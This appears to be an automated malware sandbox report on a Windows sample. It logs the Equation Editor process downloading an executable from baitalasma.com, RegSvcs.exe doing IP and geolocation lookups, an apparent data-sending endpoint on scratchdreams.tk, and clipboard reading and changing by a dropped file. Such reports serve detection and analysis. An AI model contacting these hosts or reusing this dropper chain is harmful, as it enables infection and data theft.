Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035306AA URLDownloadToFileW,

2_2_035306AA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: baitalasma.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exej
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.887544334.0000000000922000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A58000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T7643
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeate
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeqqC:
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe~x
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.104
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.1044
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk
Source: RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://scratchdreams.tk/_send_.php?TS
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown

HTTPS traffic detected: 38.242.255.115:443 -> 192.168.2.22:49164 version: TLS 1.2

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_00B8EAFF

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00B8ED6A
